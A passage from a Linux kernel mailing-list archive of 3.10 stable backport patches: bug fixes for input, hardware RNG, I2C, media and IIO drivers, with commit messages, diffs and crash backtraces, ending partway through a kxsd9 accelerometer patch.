  To: linux-kernel, stable, linux; +Cc: Dmitry Torokhov, Willy Tarreau

From: Dmitry Torokhov <dmitry.torokhov@gmail.com>

commit 47af45d684b5f3ae000ad448db02ce4f13f73273 upstream.

The commit 4097461897df ("Input: i8042 - break load dependency ...")
correctly set up ps2_cmd_mutex pointer for the KBD port but forgot to do
the same for AUX port(s), which results in communication on KBD and AUX
ports to clash with each other.

Fixes: 4097461897df ("Input: i8042 - break load dependency ...")
Reported-by: Bruno Wolff III <bruno@wolff.to>
Tested-by: Bruno Wolff III <bruno@wolff.to>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/input/serio/i8042.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/input/serio/i8042.c b/drivers/input/serio/i8042.c
index 2513c8a..2d8f959 100644
--- a/drivers/input/serio/i8042.c
+++ b/drivers/input/serio/i8042.c
@@ -1249,6 +1249,7 @@ static int __init i8042_create_aux_port(int idx)
 	serio->write		= i8042_aux_write;
 	serio->start		= i8042_start;
 	serio->stop		= i8042_stop;
+	serio->ps2_cmd_mutex	= &i8042_mutex;
 	serio->port_data	= port;
 	serio->dev.parent	= &i8042_platform_device->dev;
 	if (idx < 0) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 185/319] Input: ili210x - fix permissions on "calibrate" attribute
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (83 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 184/319] Input: i8042 - set up shared ps2_cmd_mutex for AUX ports Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 186/319] hwrng: exynos - Disable runtime PM on probe failure Willy Tarreau
                   ` (133 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dmitry Torokhov, Willy Tarreau

From: Dmitry Torokhov <dmitry.torokhov@gmail.com>

commit b27c0d0c3bf3073e8ae19875eb1d3755c5e8c072 upstream.

"calibrate" attribute does not provide "show" methods and thus we should
not mark it as readable.

Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/input/touchscreen/ili210x.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/input/touchscreen/ili210x.c b/drivers/input/touchscreen/ili210x.c
index 1418bdd..ceaa790 100644
--- a/drivers/input/touchscreen/ili210x.c
+++ b/drivers/input/touchscreen/ili210x.c
@@ -169,7 +169,7 @@ static ssize_t ili210x_calibrate(struct device *dev,
 
 	return count;
 }
-static DEVICE_ATTR(calibrate, 0644, NULL, ili210x_calibrate);
+static DEVICE_ATTR(calibrate, S_IWUSR, NULL, ili210x_calibrate);
 
 static struct attribute *ili210x_attributes[] = {
 	&dev_attr_calibrate.attr,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 186/319] hwrng: exynos - Disable runtime PM on probe failure
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (84 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 185/319] Input: ili210x - fix permissions on "calibrate" attribute Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 187/319] hwrng: omap - Fix assumption that runtime_get_sync will always succeed Willy Tarreau
                   ` (132 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Krzysztof Kozlowski, Herbert Xu, Willy Tarreau

From: Krzysztof Kozlowski <k.kozlowski@samsung.com>

commit 48a61e1e2af8020f11a2b8f8dc878144477623c6 upstream.

Add proper error path (for disabling runtime PM) when registering of
hwrng fails.

Fixes: b329669ea0b5 ("hwrng: exynos - Add support for Exynos random number generator")
Signed-off-by: Krzysztof Kozlowski <k.kozlowski@samsung.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/char/hw_random/exynos-rng.c | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/drivers/char/hw_random/exynos-rng.c b/drivers/char/hw_random/exynos-rng.c
index 402ccfb..b6ec73f 100644
--- a/drivers/char/hw_random/exynos-rng.c
+++ b/drivers/char/hw_random/exynos-rng.c
@@ -105,6 +105,7 @@ static int exynos_rng_probe(struct platform_device *pdev)
 {
 	struct exynos_rng *exynos_rng;
 	struct resource *res;
+	int ret;
 
 	exynos_rng = devm_kzalloc(&pdev->dev, sizeof(struct exynos_rng),
 					GFP_KERNEL);
@@ -132,7 +133,13 @@ static int exynos_rng_probe(struct platform_device *pdev)
 	pm_runtime_use_autosuspend(&pdev->dev);
 	pm_runtime_enable(&pdev->dev);
 
-	return hwrng_register(&exynos_rng->rng);
+	ret = hwrng_register(&exynos_rng->rng);
+	if (ret) {
+		pm_runtime_dont_use_autosuspend(&pdev->dev);
+		pm_runtime_disable(&pdev->dev);
+	}
+
+	return ret;
 }
 
 static int exynos_rng_remove(struct platform_device *pdev)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 187/319] hwrng: omap - Fix assumption that runtime_get_sync will always succeed
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (85 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 186/319] hwrng: exynos - Disable runtime PM on probe failure Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 188/319] hwrng: omap - Only fail if pm_runtime_get_sync returns < 0 Willy Tarreau
                   ` (131 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Nishanth Menon, Paul Walmsley, Herbert Xu, Willy Tarreau

From: Nishanth Menon <nm@ti.com>

commit 61dc0a446e5d08f2de8a24b45f69a1e302bb1b1b upstream.

pm_runtime_get_sync does return a error value that must be checked for
error conditions, else, due to various reasons, the device maynot be
enabled and the system will crash due to lack of clock to the hardware
module.

Before:
12.562784] [00000000] *pgd=fe193835
12.562792] Internal error: : 1406 [#1] SMP ARM
[...]
12.562864] CPU: 1 PID: 241 Comm: modprobe Not tainted 4.7.0-rc4-next-20160624 #2
12.562867] Hardware name: Generic DRA74X (Flattened Device Tree)
12.562872] task: ed51f140 ti: ed44c000 task.ti: ed44c000
12.562886] PC is at omap4_rng_init+0x20/0x84 [omap_rng]
12.562899] LR is at set_current_rng+0xc0/0x154 [rng_core]
[...]

After the proper checks:
[   94.366705] omap_rng 48090000.rng: _od_fail_runtime_resume: FIXME:
missing hwmod/omap_dev info
[   94.375767] omap_rng 48090000.rng: Failed to runtime_get device -19
[   94.382351] omap_rng 48090000.rng: initialization failed.

Fixes: 665d92fa85b5 ("hwrng: OMAP: convert to use runtime PM")
Cc: Paul Walmsley <paul@pwsan.com>
Signed-off-by: Nishanth Menon <nm@ti.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
[wt: adjusted context for pre-3.12-rc1 kernels]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/char/hw_random/omap-rng.c | 16 ++++++++++++++--
 1 file changed, 14 insertions(+), 2 deletions(-)

diff --git a/drivers/char/hw_random/omap-rng.c b/drivers/char/hw_random/omap-rng.c
index d2903e7..52aebbe 100644
--- a/drivers/char/hw_random/omap-rng.c
+++ b/drivers/char/hw_random/omap-rng.c
@@ -127,7 +127,12 @@ static int omap_rng_probe(struct platform_device *pdev)
 	dev_set_drvdata(&pdev->dev, priv);
 
 	pm_runtime_enable(&pdev->dev);
-	pm_runtime_get_sync(&pdev->dev);
+	ret = pm_runtime_get_sync(&pdev->dev);
+	if (ret) {
+		dev_err(&pdev->dev, "Failed to runtime_get device: %d\n", ret);
+		pm_runtime_put_noidle(&pdev->dev);
+		goto err_ioremap;
+	}
 
 	ret = hwrng_register(&omap_rng_ops);
 	if (ret)
@@ -182,8 +187,15 @@ static int omap_rng_suspend(struct device *dev)
 static int omap_rng_resume(struct device *dev)
 {
 	struct omap_rng_private_data *priv = dev_get_drvdata(dev);
+	int ret;
+
+	ret = pm_runtime_get_sync(dev);
+	if (ret) {
+		dev_err(dev, "Failed to runtime_get device: %d\n", ret);
+		pm_runtime_put_noidle(dev);
+		return ret;
+	}
 
-	pm_runtime_get_sync(dev);
 	omap_rng_write_reg(priv, RNG_MASK_REG, 0x1);
 
 	return 0;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 188/319] hwrng: omap - Only fail if pm_runtime_get_sync returns < 0
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (86 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 187/319] hwrng: omap - Fix assumption that runtime_get_sync will always succeed Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 189/319] i2c-eg20t: fix race between i2c init and interrupt enable Willy Tarreau
                   ` (130 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dave Gerlach, Herbert Xu, Willy Tarreau

From: Dave Gerlach <d-gerlach@ti.com>

commit ad8529fde9e3601180a839867a8ab041109aebb5 upstream.

Currently omap-rng checks the return value of pm_runtime_get_sync and
reports failure if anything is returned, however it should be checking
if ret < 0 as pm_runtime_get_sync return 0 on success but also can return
1 if the device was already active which is not a failure case. Only
values < 0 are actual failures.

Fixes: 61dc0a446e5d ("hwrng: omap - Fix assumption that runtime_get_sync will always succeed")
Signed-off-by: Dave Gerlach <d-gerlach@ti.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/char/hw_random/omap-rng.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/char/hw_random/omap-rng.c b/drivers/char/hw_random/omap-rng.c
index 52aebbe..2798fb1 100644
--- a/drivers/char/hw_random/omap-rng.c
+++ b/drivers/char/hw_random/omap-rng.c
@@ -128,7 +128,7 @@ static int omap_rng_probe(struct platform_device *pdev)
 
 	pm_runtime_enable(&pdev->dev);
 	ret = pm_runtime_get_sync(&pdev->dev);
-	if (ret) {
+	if (ret < 0) {
 		dev_err(&pdev->dev, "Failed to runtime_get device: %d\n", ret);
 		pm_runtime_put_noidle(&pdev->dev);
 		goto err_ioremap;
@@ -190,7 +190,7 @@ static int omap_rng_resume(struct device *dev)
 	int ret;
 
 	ret = pm_runtime_get_sync(dev);
-	if (ret) {
+	if (ret < 0) {
 		dev_err(dev, "Failed to runtime_get device: %d\n", ret);
 		pm_runtime_put_noidle(dev);
 		return ret;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 189/319] i2c-eg20t: fix race between i2c init and interrupt enable
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (87 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 188/319] hwrng: omap - Only fail if pm_runtime_get_sync returns < 0 Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 190/319] em28xx-i2c: rt_mutex_trylock() returns zero on failure Willy Tarreau
                   ` (129 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Yadi.hu, Wolfram Sang, Willy Tarreau

From: "Yadi.hu" <yadi.hu@windriver.com>

commit 371a015344b6e270e7e3632107d9554ec6d27a6b upstream.

the eg20t driver call request_irq() function before the pch_base_address,
base address of i2c controller's register, is assigned an effective value.

there is one possible scenario that an interrupt which isn't inside eg20t
arrives immediately after request_irq() is executed when i2c controller
shares an interrupt number with others. since the interrupt handler
pch_i2c_handler() has already active as shared action, it will be called
and read its own register to determine if this interrupt is from itself.

At that moment, since base address of i2c registers is not remapped
in kernel space yet,so the INT handler will access an illegal address
and then a error occurs.

Signed-off-by: Yadi.hu <yadi.hu@windriver.com>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/i2c/busses/i2c-eg20t.c | 18 +++++++++++-------
 1 file changed, 11 insertions(+), 7 deletions(-)

diff --git a/drivers/i2c/busses/i2c-eg20t.c b/drivers/i2c/busses/i2c-eg20t.c
index 0f37529..773a6f5 100644
--- a/drivers/i2c/busses/i2c-eg20t.c
+++ b/drivers/i2c/busses/i2c-eg20t.c
@@ -798,13 +798,6 @@ static int pch_i2c_probe(struct pci_dev *pdev,
 	/* Set the number of I2C channel instance */
 	adap_info->ch_num = id->driver_data;
 
-	ret = request_irq(pdev->irq, pch_i2c_handler, IRQF_SHARED,
-		  KBUILD_MODNAME, adap_info);
-	if (ret) {
-		pch_pci_err(pdev, "request_irq FAILED\n");
-		goto err_request_irq;
-	}
-
 	for (i = 0; i < adap_info->ch_num; i++) {
 		pch_adap = &adap_info->pch_data[i].pch_adapter;
 		adap_info->pch_i2c_suspended = false;
@@ -821,6 +814,17 @@ static int pch_i2c_probe(struct pci_dev *pdev,
 		adap_info->pch_data[i].pch_base_address = base_addr + 0x100 * i;
 
 		pch_adap->dev.parent = &pdev->dev;
+	}
+
+	ret = request_irq(pdev->irq, pch_i2c_handler, IRQF_SHARED,
+		  KBUILD_MODNAME, adap_info);
+	if (ret) {
+		pch_pci_err(pdev, "request_irq FAILED\n");
+		goto err_request_irq;
+	}
+
+	for (i = 0; i < adap_info->ch_num; i++) {
+		pch_adap = &adap_info->pch_data[i].pch_adapter;
 
 		pch_i2c_init(&adap_info->pch_data[i]);
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 190/319] em28xx-i2c: rt_mutex_trylock() returns zero on failure
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (88 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 189/319] i2c-eg20t: fix race between i2c init and interrupt enable Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 191/319] i2c: core: fix NULL pointer dereference under race condition Willy Tarreau
                   ` (128 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Dan Carpenter, Mauro Carvalho Chehab, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit e44c153b30c9a0580fc2b5a93f3c6d593def2278 upstream.

The code is checking for negative returns but it should be checking for
zero.

Fixes: aab3125c43d8 ('[media] em28xx: add support for registering multiple i2c buses')

Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Mauro Carvalho Chehab <mchehab@osg.samsung.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/media/usb/em28xx/em28xx-i2c.c | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/drivers/media/usb/em28xx/em28xx-i2c.c b/drivers/media/usb/em28xx/em28xx-i2c.c
index c4ff973..d28d906 100644
--- a/drivers/media/usb/em28xx/em28xx-i2c.c
+++ b/drivers/media/usb/em28xx/em28xx-i2c.c
@@ -469,9 +469,8 @@ static int em28xx_i2c_xfer(struct i2c_adapter *i2c_adap,
 	int addr, rc, i;
 	u8 reg;
 
-	rc = rt_mutex_trylock(&dev->i2c_bus_lock);
-	if (rc < 0)
-		return rc;
+	if (!rt_mutex_trylock(&dev->i2c_bus_lock))
+		return -EAGAIN;
 
 	/* Switch I2C bus if needed */
 	if (bus != dev->cur_i2c_bus &&
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 191/319] i2c: core: fix NULL pointer dereference under race condition
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (89 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 190/319] em28xx-i2c: rt_mutex_trylock() returns zero on failure Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 192/319] i2c: at91: fix write transfers by clearing pending interrupt first Willy Tarreau
                   ` (127 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Vladimir Zapolskiy, Wolfram Sang, Willy Tarreau

From: Vladimir Zapolskiy <vladimir_zapolskiy@mentor.com>

commit 147b36d5b70c083cc76770c47d60b347e8eaf231 upstream.

Race condition between registering an I2C device driver and
deregistering an I2C adapter device which is assumed to manage that
I2C device may lead to a NULL pointer dereference due to the
uninitialized list head of driver clients.

The root cause of the issue is that the I2C bus may know about the
registered device driver and thus it is matched by bus_for_each_drv(),
but the list of clients is not initialized and commonly it is NULL,
because I2C device drivers define struct i2c_driver as static and
clients field is expected to be initialized by I2C core:

  i2c_register_driver()             i2c_del_adapter()
    driver_register()                 ...
      bus_add_driver()                ...
        ...                           bus_for_each_drv(..., __process_removed_adapter)
      ...                               i2c_do_del_adapter()
    ...                                   list_for_each_entry_safe(..., &driver->clients, ...)
    INIT_LIST_HEAD(&driver->clients);

To solve the problem it is sufficient to do clients list head
initialization before calling driver_register().

The problem was found while using an I2C device driver with a sluggish
registration routine on a bus provided by a physically detachable I2C
master controller, but practically the oops may be reproduced under
the race between arbitraty I2C device driver registration and managing
I2C bus device removal e.g. by unbinding the latter over sysfs:

% echo 21a4000.i2c > /sys/bus/platform/drivers/imx-i2c/unbind
  Unable to handle kernel NULL pointer dereference at virtual address 00000000
  Internal error: Oops: 17 [#1] SMP ARM
  CPU: 2 PID: 533 Comm: sh Not tainted 4.9.0-rc3+ #61
  Hardware name: Freescale i.MX6 Quad/DualLite (Device Tree)
  task: e5ada400 task.stack: e4936000
  PC is at i2c_do_del_adapter+0x20/0xcc
  LR is at __process_removed_adapter+0x14/0x1c
  Flags: NzCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment none
  Control: 10c5387d  Table: 35bd004a  DAC: 00000051
  Process sh (pid: 533, stack limit = 0xe4936210)
  Stack: (0xe4937d28 to 0xe4938000)
  Backtrace:
  [<c0667be0>] (i2c_do_del_adapter) from [<c0667cc0>] (__process_removed_adapter+0x14/0x1c)
  [<c0667cac>] (__process_removed_adapter) from [<c0516998>] (bus_for_each_drv+0x6c/0xa0)
  [<c051692c>] (bus_for_each_drv) from [<c06685ec>] (i2c_del_adapter+0xbc/0x284)
  [<c0668530>] (i2c_del_adapter) from [<bf0110ec>] (i2c_imx_remove+0x44/0x164 [i2c_imx])
  [<bf0110a8>] (i2c_imx_remove [i2c_imx]) from [<c051a838>] (platform_drv_remove+0x2c/0x44)
  [<c051a80c>] (platform_drv_remove) from [<c05183d8>] (__device_release_driver+0x90/0x12c)
  [<c0518348>] (__device_release_driver) from [<c051849c>] (device_release_driver+0x28/0x34)
  [<c0518474>] (device_release_driver) from [<c0517150>] (unbind_store+0x80/0x104)
  [<c05170d0>] (unbind_store) from [<c0516520>] (drv_attr_store+0x28/0x34)
  [<c05164f8>] (drv_attr_store) from [<c0298acc>] (sysfs_kf_write+0x50/0x54)
  [<c0298a7c>] (sysfs_kf_write) from [<c029801c>] (kernfs_fop_write+0x100/0x214)
  [<c0297f1c>] (kernfs_fop_write) from [<c0220130>] (__vfs_write+0x34/0x120)
  [<c02200fc>] (__vfs_write) from [<c0221088>] (vfs_write+0xa8/0x170)
  [<c0220fe0>] (vfs_write) from [<c0221e74>] (SyS_write+0x4c/0xa8)
  [<c0221e28>] (SyS_write) from [<c0108a20>] (ret_fast_syscall+0x0/0x1c)

Signed-off-by: Vladimir Zapolskiy <vladimir_zapolskiy@mentor.com>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/i2c/i2c-core.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/i2c/i2c-core.c b/drivers/i2c/i2c-core.c
index 9d539cb..c0e4143 100644
--- a/drivers/i2c/i2c-core.c
+++ b/drivers/i2c/i2c-core.c
@@ -1323,6 +1323,7 @@ int i2c_register_driver(struct module *owner, struct i2c_driver *driver)
 	/* add the driver to the list of i2c drivers in the driver core */
 	driver->driver.owner = owner;
 	driver->driver.bus = &i2c_bus_type;
+	INIT_LIST_HEAD(&driver->clients);
 
 	/* When registration returns, the driver core
 	 * will have called probe() for all matching-but-unbound devices.
@@ -1341,7 +1342,6 @@ int i2c_register_driver(struct module *owner, struct i2c_driver *driver)
 
 	pr_debug("i2c-core: driver [%s] registered\n", driver->driver.name);
 
-	INIT_LIST_HEAD(&driver->clients);
 	/* Walk the adapters that are already present */
 	i2c_for_each_dev(driver, __process_new_driver);
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 192/319] i2c: at91: fix write transfers by clearing pending interrupt first
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (90 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 191/319] i2c: core: fix NULL pointer dereference under race condition Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 193/319] iio: accel: kxsd9: Fix raw read return Willy Tarreau
                   ` (126 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Cyrille Pitchen, Ludovic Desroches, Wolfram Sang, Willy Tarreau

From: Cyrille Pitchen <cyrille.pitchen@atmel.com>

commit 6f6ddbb09d2a5baded0e23add3ad2d9e9417ab30 upstream.

In some cases a NACK interrupt may be pending in the Status Register (SR)
as a result of a previous transfer. However at91_do_twi_transfer() did not
read the SR to clear pending interruptions before starting a new transfer.
Hence a NACK interrupt rose as soon as it was enabled again at the I2C
controller level, resulting in a wrong sequence of operations and strange
patterns of behaviour on the I2C bus, such as a clock stretch followed by
a restart of the transfer.

This first issue occurred with both DMA and PIO write transfers.

Also when a NACK error was detected during a PIO write transfer, the
interrupt handler used to wrongly start a new transfer by writing into the
Transmit Holding Register (THR). Then the I2C slave was likely to reply
with a second NACK.

This second issue is fixed in atmel_twi_interrupt() by handling the TXRDY
status bit only if both the TXCOMP and NACK status bits are cleared.

Tested with a at24 eeprom on sama5d36ek board running a linux-4.1-at91
kernel image. Adapted to linux-next.

Reported-by: Peter Rosin <peda@lysator.liu.se>
Signed-off-by: Cyrille Pitchen <cyrille.pitchen@atmel.com>
Signed-off-by: Ludovic Desroches <ludovic.desroches@atmel.com>
Tested-by: Peter Rosin <peda@lysator.liu.se>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Fixes: 93563a6a71bb ("i2c: at91: fix a race condition when using the DMA controller")
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/i2c/busses/i2c-at91.c | 58 +++++++++++++++++++++++++++++++++++++------
 1 file changed, 50 insertions(+), 8 deletions(-)

diff --git a/drivers/i2c/busses/i2c-at91.c b/drivers/i2c/busses/i2c-at91.c
index ceabcfe..c880d13 100644
--- a/drivers/i2c/busses/i2c-at91.c
+++ b/drivers/i2c/busses/i2c-at91.c
@@ -371,19 +371,57 @@ static irqreturn_t atmel_twi_interrupt(int irq, void *dev_id)
 
 	if (!irqstatus)
 		return IRQ_NONE;
-	else if (irqstatus & AT91_TWI_RXRDY)
-		at91_twi_read_next_byte(dev);
-	else if (irqstatus & AT91_TWI_TXRDY)
-		at91_twi_write_next_byte(dev);
-
-	/* catch error flags */
-	dev->transfer_status |= status;
 
+	/*
+	 * When a NACK condition is detected, the I2C controller sets the NACK,
+	 * TXCOMP and TXRDY bits all together in the Status Register (SR).
+	 *
+	 * 1 - Handling NACK errors with CPU write transfer.
+	 *
+	 * In such case, we should not write the next byte into the Transmit
+	 * Holding Register (THR) otherwise the I2C controller would start a new
+	 * transfer and the I2C slave is likely to reply by another NACK.
+	 *
+	 * 2 - Handling NACK errors with DMA write transfer.
+	 *
+	 * By setting the TXRDY bit in the SR, the I2C controller also triggers
+	 * the DMA controller to write the next data into the THR. Then the
+	 * result depends on the hardware version of the I2C controller.
+	 *
+	 * 2a - Without support of the Alternative Command mode.
+	 *
+	 * This is the worst case: the DMA controller is triggered to write the
+	 * next data into the THR, hence starting a new transfer: the I2C slave
+	 * is likely to reply by another NACK.
+	 * Concurrently, this interrupt handler is likely to be called to manage
+	 * the first NACK before the I2C controller detects the second NACK and
+	 * sets once again the NACK bit into the SR.
+	 * When handling the first NACK, this interrupt handler disables the I2C
+	 * controller interruptions, especially the NACK interrupt.
+	 * Hence, the NACK bit is pending into the SR. This is why we should
+	 * read the SR to clear all pending interrupts at the beginning of
+	 * at91_do_twi_transfer() before actually starting a new transfer.
+	 *
+	 * 2b - With support of the Alternative Command mode.
+	 *
+	 * When a NACK condition is detected, the I2C controller also locks the
+	 * THR (and sets the LOCK bit in the SR): even though the DMA controller
+	 * is triggered by the TXRDY bit to write the next data into the THR,
+	 * this data actually won't go on the I2C bus hence a second NACK is not
+	 * generated.
+	 */
 	if (irqstatus & (AT91_TWI_TXCOMP | AT91_TWI_NACK)) {
 		at91_disable_twi_interrupts(dev);
 		complete(&dev->cmd_complete);
+	} else if (irqstatus & AT91_TWI_RXRDY) {
+		at91_twi_read_next_byte(dev);
+	} else if (irqstatus & AT91_TWI_TXRDY) {
+		at91_twi_write_next_byte(dev);
 	}
 
+	/* catch error flags */
+	dev->transfer_status |= status;
+
 	return IRQ_HANDLED;
 }
 
@@ -391,6 +429,7 @@ static int at91_do_twi_transfer(struct at91_twi_dev *dev)
 {
 	int ret;
 	bool has_unre_flag = dev->pdata->has_unre_flag;
+	unsigned sr;
 
 	/*
 	 * WARNING: the TXCOMP bit in the Status Register is NOT a clear on
@@ -426,13 +465,16 @@ static int at91_do_twi_transfer(struct at91_twi_dev *dev)
 	INIT_COMPLETION(dev->cmd_complete);
 	dev->transfer_status = 0;
 
+	/* Clear pending interrupts, such as NACK. */
+	sr = at91_twi_read(dev, AT91_TWI_SR);
+
 	if (!dev->buf_len) {
 		at91_twi_write(dev, AT91_TWI_CR, AT91_TWI_QUICK);
 		at91_twi_write(dev, AT91_TWI_IER, AT91_TWI_TXCOMP);
 	} else if (dev->msg->flags & I2C_M_RD) {
 		unsigned start_flags = AT91_TWI_START;
 
-		if (at91_twi_read(dev, AT91_TWI_SR) & AT91_TWI_RXRDY) {
+		if (sr & AT91_TWI_RXRDY) {
 			dev_err(dev->dev, "RXRDY still set!");
 			at91_twi_read(dev, AT91_TWI_RHR);
 		}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 193/319] iio: accel: kxsd9: Fix raw read return
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (91 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 192/319] i2c: at91: fix write transfers by clearing pending interrupt first Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 194/319] iio: accel: kxsd9: Fix scaling bug Willy Tarreau
                   ` (125 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Linus Walleij, Jonathan Cameron, Willy Tarreau

From: Linus Walleij <linus.walleij@linaro.org>

commit 7ac61a062f3147dc23e3f12b9dfe7c4dd35f9cb8 upstream.

Any readings from the raw interface of the KXSD9 driver will
return an empty string, because it does not return
IIO_VAL_INT but rather some random value from the accelerometer
to the caller.

Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/iio/accel/kxsd9.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/iio/accel/kxsd9.c b/drivers/iio/accel/kxsd9.c
index a22c427..d94c0ca 100644
--- a/drivers/iio/accel/kxsd9.c
+++ b/drivers/iio/accel/kxsd9.c
@@ -160,6 +160,7 @@ static int kxsd9_read_raw(struct iio_dev *indio_dev,
 		if (ret < 0)
 			goto error_ret;
 		*val = ret;
+		ret = IIO_VAL_INT;
 		break;
 	case IIO_CHAN_INFO_SCALE:
